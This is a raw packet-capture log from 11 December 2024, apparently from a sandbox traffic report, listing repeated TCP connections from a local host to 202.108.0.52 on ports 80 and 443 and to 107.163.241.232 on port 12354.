                                              Dec 11, 2024 16:27:50.888977051 CET5676880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.008373022 CET8056768202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:51.008455038 CET5676880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.008574009 CET8054889202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:51.008621931 CET5488980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.009728909 CET5676880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.129158020 CET8056768202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:51.290885925 CET5676880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.290911913 CET5638212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.291621923 CET5710612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.292458057 CET5640212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.406301975 CET5715912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.407335997 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.411079884 CET1235457106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:51.411170959 CET5710612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.411711931 CET5710612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.525775909 CET1235457159107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:51.525849104 CET5715912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.526087046 CET5715912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:51.526674986 CET8057160202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:51.526757956 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.527291059 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:51.531059980 CET1235457106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:51.645298958 CET1235457159107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:51.646604061 CET8057160202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:53.095398903 CET8057160202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:53.095530987 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:53.241413116 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:53.241466999 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:53.241535902 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:53.242202044 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:53.242219925 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:53.517019033 CET1235457106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.517081976 CET5710612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.562541008 CET5710612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.563095093 CET5839112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.647473097 CET1235457159107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.647531986 CET5715912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.648876905 CET5715912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.675637960 CET5841812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.682238102 CET1235457106107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.682708025 CET1235458391107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.682770014 CET5839112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.686094046 CET5839112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.768138885 CET1235457159107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.795798063 CET1235458418107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.795877934 CET5841812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.796662092 CET5841812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:53.806155920 CET1235458391107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:53.916177034 CET1235458418107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:54.931443930 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:54.931582928 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:54.931749105 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:54.932382107 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:54.932506084 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:54.935487032 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:54.935560942 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:54.935760021 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:54.935764074 CET44358388202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:54.935811043 CET58388443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.044745922 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.045190096 CET5975980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.164606094 CET8057160202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:55.164624929 CET8059759202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:55.164709091 CET5975980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.164727926 CET5716080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.165064096 CET5975980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.284420967 CET8059759202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:55.307137966 CET5975980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.307184935 CET5839112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.307207108 CET5841812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.308130026 CET5986012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.427557945 CET1235459860107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:55.427647114 CET5986012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.445580959 CET5986012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.457756042 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.458321095 CET5996012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.566047907 CET1235459860107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:55.577150106 CET8059959202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:55.577697992 CET1235459960107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:55.577783108 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.577877998 CET5996012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.578483105 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:55.578799963 CET5996012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:55.701033115 CET8059959202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:55.701349974 CET1235459960107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.157557011 CET8059959202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:57.158361912 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:57.162600040 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:57.162655115 CET44361601202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:57.163038969 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:57.163966894 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:57.163983107 CET44361601202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:57.532629967 CET1235459860107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.532695055 CET5986012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.536326885 CET5986012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.537122965 CET6203812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.656002998 CET1235459860107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.656656027 CET1235462038107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.656728029 CET6203812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.678783894 CET6203812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.690438986 CET1235459960107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.690495014 CET5996012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.691176891 CET5996012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.691625118 CET6215012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.798034906 CET1235462038107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.812195063 CET1235459960107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.812941074 CET1235462150107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:57.813005924 CET6215012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.813513994 CET6215012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:57.935332060 CET1235462150107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:58.859172106 CET44361601202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:58.859249115 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:58.860004902 CET44361601202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:58.860044956 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:58.879488945 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:58.879564047 CET44361601202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:58.879683018 CET61601443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:58.997845888 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:58.998230934 CET6317280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.117844105 CET8059959202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:59.117861986 CET8063172202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:59.117907047 CET5995980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.117954969 CET6317280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.118459940 CET6317280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.237893105 CET8063172202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:59.472713947 CET6317280192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.472742081 CET6203812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.472769976 CET6215012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.510804892 CET6363112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.628648996 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.629247904 CET6370212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.630476952 CET1235463631107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:59.632211924 CET6363112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.632213116 CET6363112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.750143051 CET8063701202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:59.750174046 CET1235463702107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:59.750211000 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.750252008 CET6370212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.756589890 CET1235463631107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:59.761954069 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:59.762166023 CET6370212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:59.881335974 CET8063701202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:59.881581068 CET1235463702107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.305346966 CET8063701202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:01.305425882 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:01.309783936 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:01.309834003 CET44363849202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:01.309897900 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:01.314920902 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:01.314934015 CET44363849202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:01.754426956 CET1235463631107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.758450985 CET6363112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.759090900 CET6363112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.759618044 CET6443912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.862418890 CET1235463702107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.862756014 CET6370212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.863020897 CET6370212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.872416019 CET6458012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.878985882 CET1235463631107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.879008055 CET1235464439107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.879106998 CET6443912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.879388094 CET6443912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.983196020 CET1235463702107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.992386103 CET1235464580107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:01.992460012 CET6458012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.994566917 CET6458012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:01.999397039 CET1235464439107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:02.114411116 CET1235464580107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:03.010546923 CET44363849202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.010684967 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.011368036 CET44363849202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.011423111 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.199004889 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.199094057 CET44363849202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.199166059 CET63849443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.565068007 CET6443912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.565095901 CET6458012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.568361998 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.599963903 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.600455046 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.685982943 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.687786102 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:03.688304901 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.689810991 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.720046043 CET8063701202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.720074892 CET8065396202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.720101118 CET6370180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.720160961 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.729294062 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:03.805463076 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:03.805536032 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.805891037 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:03.809097052 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:03.848700047 CET8065396202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:03.925570011 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:05.267011881 CET8065396202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:05.267168045 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.270565033 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.270590067 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:05.270745039 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.271174908 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:05.271188021 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:05.858772993 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:05.860337973 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:05.925735950 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:05.928322077 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.003770113 CET6539412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.004983902 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.123136044 CET1235465394107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.124205112 CET1235450784107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.124325037 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.271002054 CET6542512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.272665024 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.306508064 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.390670061 CET1235465425107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.392424107 CET1235450784107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.428483009 CET1235450786107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.432327986 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.580540895 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:06.777991056 CET1235450786107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:06.960267067 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.960376024 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.961014986 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.961114883 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.964282036 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:06.964665890 CET44350458202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:06.964735985 CET50458443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.076102018 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.076360941 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.199409008 CET8051151202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.199424982 CET8065396202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.199518919 CET6539680192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.199527025 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.203725100 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.323296070 CET8051151202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.572292089 CET5078412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.572325945 CET5078612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.572331905 CET5115180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.572828054 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.687474966 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.688611031 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.693459988 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.693555117 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.693909883 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.807126045 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.807279110 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.808047056 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:07.808285952 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.808485985 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.809799910 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:07.814207077 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:07.928402901 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:07.929409981 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.379700899 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.380338907 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.569103003 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.569144964 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.569216967 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.570442915 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:09.570458889 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:09.815726042 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.815792084 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.815885067 CET5153712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.816447020 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.923489094 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.923820972 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.935050964 CET1235451537107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.935740948 CET1235452558107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:09.935935974 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.940814018 CET5167512354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.941750050 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:09.944701910 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.060410023 CET1235451675107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.061414957 CET1235452558107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.064156055 CET1235452693107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:10.064224005 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.064570904 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:10.185642958 CET1235452693107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.281533003 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.281620979 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.282500982 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.282581091 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.303371906 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.303474903 CET44352420202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.303554058 CET52420443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.424921989 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.425407887 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.545224905 CET8053801202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.545315981 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.545839071 CET8051673202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.545958042 CET5167380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.546214104 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.601738930 CET5269312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.601780891 CET5255812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.601787090 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.613280058 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.669091940 CET8053801202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.669157028 CET5380180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.733010054 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.733103991 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.761591911 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.811222076 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.811866999 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.885688066 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.931361914 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:11.931432962 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.932034969 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:11.932097912 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:11.951822996 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:11.951911926 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:12.071841002 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:12.072009087 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.505053043 CET8053859202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.505125999 CET5385980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.510031939 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.510057926 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.510234118 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.514756918 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:13.514767885 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:13.848012924 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.849785089 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.850191116 CET5385212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.850193024 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.970993996 CET1235453852107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.971007109 CET1235455592107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:13.971215963 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:13.974351883 CET5559212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.065956116 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.066138029 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.066514015 CET5385812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.067058086 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.093791008 CET1235455592107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.185815096 CET1235453858107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.186866999 CET1235455780107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:14.187055111 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.187589884 CET5578012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:28:14.310024977 CET1235455780107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:28:15.240447998 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.240515947 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.241198063 CET44355203202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:28:15.241302013 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.245805025 CET55203443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:28:15.245852947 CET44355203202.108.0.52192.168.2.4
